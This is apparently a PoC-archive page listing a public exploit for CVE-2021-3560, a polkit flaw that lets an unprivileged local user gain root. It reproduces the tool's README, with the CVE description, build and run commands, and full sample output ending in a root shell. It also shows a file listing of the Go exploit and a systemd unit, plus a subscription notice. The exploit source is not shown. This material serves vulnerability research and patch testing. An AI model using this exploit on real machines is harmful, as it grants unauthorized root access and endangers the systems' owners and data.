Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-3560 PoC — polkit 代码问题漏洞

Source
https://github.com/RicterZ/CVE-2021-3560-Authentication-Agent
Associated Vulnerability
Title:polkit 代码问题漏洞 (CVE-2021-3560)
Description:It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
Description
PolicyKit CVE-2021-3560 Exploit (Authentication Agent)
Readme
PolicyKit CVE-2021-3560 Exploit  (Authentication Agent)
====

### Technology Details
Blog posts about this exploit : 
- https://ricterz.me/posts/2022-04-28-a-new-exploit-method-for-cve-2021-3560-polkit-linux-privilege-escalation.txt
- http://noahblog.360.cn/a-new-exploit-method-for-cve-2021-3560-policykit-linux-privilege-escalation

## Build & Usage
```
nobody@test:/tmp/CVE-2021-3560$ go build
nobody@test:/tmp/CVE-2021-3560$ ./CVE-2021-3560 ./pwnkit.service
=== polkit CVE-2021-3560 exploit - RicterZ @ 360 Noah Lab ===
pid-267920 - [*] Registering PolicyKit authentication agent ...
...
pid-267915 - [-] Exploit failed, please try again
nobody@test:/tmp/CVE-2021-3560$ ./CVE-2021-3560 ./pwnkit.service
=== polkit CVE-2021-3560 exploit - RicterZ @ 360 Noah Lab ===
pid-267963 - [*] Registering PolicyKit authentication agent ...
pid-267963 - [*] Authentication agent main loop running ...
pid-267968 - [*] Registering PolicyKit authentication agent ...
pid-267973 - [*] Registering PolicyKit authentication agent ...
pid-267968 - [*] Authentication agent main loop running ...
pid-267973 - [*] Authentication agent main loop running ...
pid-267963 - [*] Starting systemd service 'pwnkit.service' ...
pid-267968 - [*] Enabling systemd unit file '/tmp/pwnkit.service' ...
pid-267973 - [*] Reloading systemd daemon ...
pid-267963 - [+] Received authentication request for action: 'org.freedesktop.systemd1.manage-units'
pid-267963 - [*] Cookie: 100-9b8357901e7f4f4847cbd15a3d191cc4-1-10167c9df23ebe27c57534750f48ef7a
pid-267968 - [+] Received authentication request for action: 'org.freedesktop.systemd1.manage-unit-files'
pid-267968 - [*] Cookie: 101-48273279f75230e86c9ad5df212ee54d-1-a86a81adcf07ad16ab6017a21235da80
pid-267973 - [+] Received authentication request for action: 'org.freedesktop.systemd1.reload-daemon'
pid-267973 - [*] Cookie: 102-3fb9b174b470f5d04881cbfeb16a60d0-1-8a36d3a7f9aca22af0a0f8562f20dbe2
pid-267958 - [+] File exists, popping root shell ...
pwned-5.0# id
uid=65534(nobody) gid=65534(nogroup) euid=0(root) egid=0(root) groups=0(root),65534(nogroup)
```

## License
Apache License
File Snapshot

 [4.0K]  /data/pocs/9f70ecc6024b1f70c252c56e16ba7d56839864e1
├── [2.6K]  agent.go
├── [3.9K]  exploit.go
├── [  72]  go.mod
├── [ 260]  go.sum
├── [ 11K]  LICENSE
├── [ 205]  pwnkit.service
└── [2.1K]  README.md

0 directories, 7 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →